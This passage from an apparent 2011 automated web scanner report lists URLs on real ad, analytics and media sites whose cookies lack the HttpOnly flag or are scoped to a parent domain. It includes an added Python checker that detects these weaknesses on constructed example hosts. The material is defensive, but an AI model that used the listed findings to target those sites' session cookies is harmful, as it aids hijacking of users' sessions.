11.139. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.140. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.141. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.142. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.143. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.144. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.145. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.146. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.147. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.148. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.149. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.150. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.151. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.152. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.153. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.154. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.155. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.156. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.157. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.158. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.159. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.160. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.161. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.162. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.163. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.164. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.165. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.166. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.167. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.168. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.169. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.170. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.171. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.172. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.173. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.174. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.175. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.176. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.177. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.178. http://tag.contextweb.com/TagPublish/GetAd.aspx
11.179. http://tag.contextweb.com/TagPublish/GetAd.aspx
11.180. http://tenzing.fmpub.net/
11.181. http://testdm.travelers.com/trvwics.gif
11.182. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FPhotoSlideShow%2FYAHOO_143_B2C_Mail_Expandable_954x60%2CC%3DMail%2CP%3DYahoo%2CK%3D3078101/0.9137649598997086/0/in%2Cti/ti.gif
11.183. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.21918878913857043/0/in%2Cti/ti.gif
11.184. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.3687601247802377/0/in%2Cti/ti.gif
11.185. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.558339134324342/0/in%2Cti/ti.gif
11.186. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.9227102545555681/0/in%2Cti/ti.gif
11.187. http://traffic.outbrain.com/network/redir
11.188. http://u-ads.adap.tv/a/h/HuqeLZgU_XaX8g16tMn8bSkO7yiAt1QCn5DKEyqYSJq69nbfVmH21Q==
11.189. http://u-ads.adap.tv/a/h/HuqeLZgU_Xbwoj9zW9AgbDCxmf2_Fc99
11.190. http://usadmm.dotomi.com/dmm/servlet/dmm
11.191. http://vads.adbrite.com/vast/adserver
11.192. http://vlog.leadforce1.com/bf/bf.php
11.193. http://www.att.com/u-verse/availability/
11.194. http://www.bradsdeals.com/dealsoftheday/subscribe/b
11.195. http://www.giganews.com/
11.196. http://www.giganews.com/s/google/nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact
11.197. http://www.google.com/sorry/
11.198. http://www.google.com/sorry/Captcha
11.199. http://www.nntpserver.com/gl/
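Categories 9 (SSL cookie without secure flag set), 10 (Session token in URL), 11 (Cookie scoped to parent domain) and 12 (Cookie without HttpOnly flag set, which follows) are passive checks on Set-Cookie attributes and query strings. The following added example, not code from the report or the scanner that produced it, implements simplified versions of all four. The responses and URLs are constructed on example.* hosts, and the list of session-like parameter names is an assumption rather than the scanner's actual rule set.

```python
"""Passive cookie and URL checks matching four categories in this report:
SSL cookie without secure flag set, Session token in URL, Cookie scoped to
parent domain, and Cookie without HttpOnly flag set.

Added example; not code from the report or the scanner behind it. Inputs are
constructed (assumption: example.* hosts, not the hosts listed in the report).
"""
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names commonly used for session identifiers (assumption: an
# approximation, not the scanner's real list).
SESSION_PARAM_RE = re.compile(
    r"^(?:(?:php|j|asp\.net_)?sess(?:ion)?_?id|sid|session|token|auth(?:token)?)$", re.I)


def parse_set_cookie(header):
    """Split a Set-Cookie header into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def check_cookie(url, header):
    """Return (cookie name, [category names]) for one Set-Cookie header on one URL."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    name, _, attrs = parse_set_cookie(header)
    findings = []
    # Category 9: set over HTTPS without Secure, the cookie also rides plain-HTTP requests.
    if parts.scheme == "https" and "secure" not in attrs:
        findings.append("SSL cookie without secure flag set")
    # Category 11: Domain set to a parent of the issuing host shares the cookie
    # with every sibling host under that parent.
    domain = attrs.get("domain", "").lstrip(".").lower()
    if domain and domain != host and host.endswith("." + domain):
        findings.append("Cookie scoped to parent domain")
    # Category 12: without HttpOnly, script running on the page can read it.
    if "httponly" not in attrs:
        findings.append("Cookie without HttpOnly flag set")
    return name, findings


def check_url(url):
    """Category 10: session-like parameter names carried in the query string."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return sorted(p for p in query if SESSION_PARAM_RE.match(p))


SAMPLE_RESPONSES = [  # constructed, not captured traffic
    ("https://www.example.com/signup", "sid=3f9a1c; Path=/; Domain=.example.com"),
    ("https://www.example.com/signup", "sid=3f9a1c; Path=/; Secure; HttpOnly"),
    ("http://ads.example.net/pixel",
     "uid=42; Domain=example.net; Path=/; Expires=Wed, 21 Oct 2026 07:28:00 GMT"),
    ("http://www.example.org/", "prefs=dark; Path=/; HttpOnly"),
]
SAMPLE_URLS = [
    "http://www.example.org/error.gif?PHPSESSID=9c1e2b&x=1",
    "http://www.example.org/search?q=test",
]


def scan(responses=SAMPLE_RESPONSES, urls=SAMPLE_URLS):
    """Return [(category, url, cookie name or parameter)] over all inputs."""
    report = []
    for url, header in responses:
        name, findings = check_cookie(url, header)
        report.extend((f, url, name) for f in findings)
    for url in urls:
        report.extend(("Session token in URL", url, p) for p in check_url(url))
    return report


if __name__ == "__main__":
    for category, url, what in scan():
        print(f"{category}: {url} [{what}]")
```

These are advisory findings, and most hosts in categories 11 and 12 are ad or analytics third parties whose cookies are not session tokens, so the flags matter mainly for session cookies on pages such as the sign-in URLs listed. HttpOnly stops a script from reading the cookie value; it does not stop an XSS payload from making requests that carry it.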
12. Cookie without HttpOnly flag set
12.1. http://ads.adxpose.com/ads/ads.js
12.2. http://afe.specificclick.net/
12.3. http://alerts.4info.com/alert/ads/dispatcher.jsp
12.4. http://alerts.4info.com/alert/ads/fastTrackAlerts.js
12.5. http://blekko.com/a/e
12.6. http://blekko.com/a/favicon
12.7. http://blekko.com/a/track
12.8. http://blekko.com/autocomplete
12.9. http://event.adxpose.com/event.flow
12.10. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9
12.11. http://pixel.adsafeprotected.com/jspix
12.12. http://sales.liveperson.net/visitor/addons/deploy.asp
12.13. http://www-304.ibm.com/support/operations/us/en/orderdelivery
12.14. http://www.ibm.com/developerworks/forums/comment.jspa
12.15. http://www.ibm.com/developerworks/utils/ratingJSON.jsp
12.16. http://www.mailjet.com/
12.17. http://www.mailjet.com/pricing
12.18. https://www.mailjet.com/signup
12.19. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
12.20. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/
12.21. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/
12.22. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
12.23. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/
12.24. http://www.tmz.com/reset-password/
12.25. http://www.tmz.com/signin/
12.26. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
12.27. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
12.28. http://www.toofab.com/category/celeb-couples/
12.29. http://www.toofab.com/news/
12.30. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp
12.31. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp
12.32. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp
12.33. http://27.xg4ken.com/media/redir.php
12.34. http://2912a.v.fwmrm.net/ad/l/1
12.35. http://2912a.v.fwmrm.net/ad/l/1
12.36. http://2912a.v.fwmrm.net/ad/l/1
12.37. http://2912a.v.fwmrm.net/ad/p/1
12.38. http://a.collective-media.net/adj/cm.rev_bostonherald/
12.39. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience
12.40. http://a.collective-media.net/adj/q1.bosherald/be_news
12.41. http://a.collective-media.net/adj/q1.bosherald/ent_fr
12.42. http://a.collective-media.net/adj/q1.bosherald/news
12.43. http://a.collective-media.net/cmadj/cm.rev_bostonherald/
12.44. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience
12.45. http://a.collective-media.net/cmadj/q1.bosherald/be_news
12.46. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr
12.47. http://a.collective-media.net/cmadj/q1.bosherald/news
12.48. http://a.tribalfusion.com/i.cid
12.49. http://a.tribalfusion.com/j.ad
12.50. http://a.tribalfusion.com/z/i.cid
12.51. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.2
12.52. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.3
12.53. http://ad.doubleclick.net/adj/q1.bosherald/be_news
12.54. http://ad.doubleclick.net/adj/q1.bosherald/news
12.55. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_hookups
12.56. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_justice
12.57. http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/w%3B245892120%3B0-0%3B0%3B69485624%3B4986-300/600%3B43918246/43936033/1%3B%3B~okv%3D%3Bpc%3DDFP245079213%3B%3B~fdr%3D245079213%3B0-0%3B0%3B61866028%3B4986-300/600%3B44072410/44090197/1%3B%3B~sscs%3D%3fhttp://t.mookie1.com/t/v1/clk
12.58. http://ad.yieldmanager.com/imp
12.59. http://ad.yieldmanager.com/pixel
12.60. http://ads.lucidmedia.com/clicksense/pixel
12.61. http://adserver.teracent.net/tase/ad
12.62. http://adserver.teracent.net/tase/redir/1316221519820_135153353_as3104_imp/vew
12.63. http://adserver.teracent.net/tase/redir/1316221548433_135109402_as3106_imp/vew
12.64. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php
12.65. http://apis.google.com/js/plusone.js
12.66. http://ar.voicefive.com/b/recruitBeacon.pli
12.67. http://ar.voicefive.com/b/wc_beacon.pli
12.68. http://ar.voicefive.com/bmx3/broker.pli
12.69. http://attuverseoffers.com/tv_hsi_bundles/index.php
12.70. http://b.scorecardresearch.com/b
12.71. http://b.scorecardresearch.com/p
12.72. http://b.scorecardresearch.com/r
12.73. http://b.voicefive.com/b
12.74. http://b.voicefive.com/p
12.75. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2
12.76. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0
12.77. http://bostonheraldnie.newspaperdirect.com/epaper/viewer.aspx
12.78. http://c.statcounter.com/t.php
12.79. http://cdnt.meteorsolutions.com/api/setid
12.80. http://cdnt.meteorsolutions.com/api/track
12.81. http://cdnt.meteorsolutions.com/api/track
12.82. http://clk.atdmt.com/go/335787632/direct
12.83. http://cpanel.app9.hubspot.com/salog.js.aspx
12.84. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js
12.85. http://d7.zedo.com/img/bh.gif
12.86. http://d7.zedo.com/utils/ecSet.js
12.87. http://dc.tremormedia.com/comp.gif
12.88. http://dc.tremormedia.com/crossdomain.xml
12.89. http://dc.tremormedia.com/st.gif
12.90. http://forums.cpanel.net/calendar.php
12.91. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
12.92. http://g2.gumgum.com/services/get
12.93. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030885431/
12.94. http://i.w55c.net/a.gif
12.95. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard
12.96. http://image2.pubmatic.com/AdServer/Pug
12.97. http://imp.fetchback.com/serve/fb/adtag.js
12.98. http://imp.fetchback.com/serve/fb/imp
12.99. http://info.mailtraq.com/142/
12.100. http://info.mailtraq.com/716/
12.101. http://info.mailtraq.com/imap
12.102. http://info.mailtraq.com/wac
12.103. http://leadback.advertising.com/adcedge/lb
12.104. http://leadback.advertising.com/adcedge/lb
12.105. http://livechat.iadvize.com/chat_init.js
12.106. http://livechat.iadvize.com/rpc/referrer.php
12.107. http://loadm.exelator.com/load/
12.108. http://log.go.com/log
12.109. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Bottom
12.110. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle
12.111. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1
12.112. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top
12.113. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom
12.114. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle
12.115. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1
12.116. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top
12.117. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@x01!x01
12.118. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Bottom
12.119. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle
12.120. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top
12.121. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@x01!x01
12.122. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle
12.123. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1
12.124. http://odb.outbrain.com/utils/get
12.125. http://omg.yahoo.com/photos/what-were-they-thinking/5203
12.126. http://ping.crowdscience.com/ping.js
12.127. http://q1.checkm8.com/adam/detect
12.128. http://q1.checkm8.com/adam/report
12.129. http://r.turn.com/r/beacon
12.130. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/
12.131. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653
12.132. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13141172/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome
12.133. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13161297/hr=1/hl=11/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CBottom%2526page%253Dbh.heraldinteractive.com%25252F%252Fyour_tax_dollars_at_work
12.134. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13485129/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle
12.135. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=14907432/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome
12.136. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=39615410/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome
12.137. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=4347768/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome
12.138. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=71688841/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
12.139. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=73068085/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
12.140. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=87670031/hr=1/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome
12.141. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=15131969/hr=1/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fregional%25252Farticle
12.142. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=36701179/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
12.143. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=3823857/hr=1/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fcolumnists%25252Farticle
12.144. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=4214348/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle
12.145. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=94471246/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
12.146. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=1532848/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome
12.147. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=19365718/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome
12.148. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=2205187/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome
12.149. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=73177346/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome
12.150. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=4256658/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tmz.com%252F2011%252F09%252F16%252Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%252F%253Fadid%253Dhero1
12.151. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=
12.152. http://r1-ads.ace.advertising.com/site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D
12.153. http://receive.inplay.tubemogul.com/StreamReceiver/services
12.154. http://rs.gwallet.com/r1/pixel/x420r2425801
12.155. http://rt.legolas-media.com/lgrt
12.156. http://rt1302.infolinks.com/action/doq.htm
12.157. http://rt1701.infolinks.com/action/doq.htm
12.158. http://rt1702.infolinks.com/action/doq.htm
12.159. http://rt1803.infolinks.com/action/doq.htm
12.160. http://rt1804.infolinks.com/action/doq.htm
12.161. http://rt1901.infolinks.com/action/doq.htm
12.162. http://rt1903.infolinks.com/action/doq.htm
12.163. http://sales.liveperson.net/hc/25199332/
12.164. http://sales.liveperson.net/hc/25199332/
12.165. http://search.yahoo.com/search
12.166. http://sensor2.suitesmart.com/sensor4.js
12.167. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.168. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.169. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.170. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.171. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.172. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.173. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.174. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.175. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.176. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.177. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.178. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.179. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.180. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.181. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.182. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.183. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.184. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.185. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.186. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.187. http://showadsak.pubmatic.com/AdServer/AdServerServlet
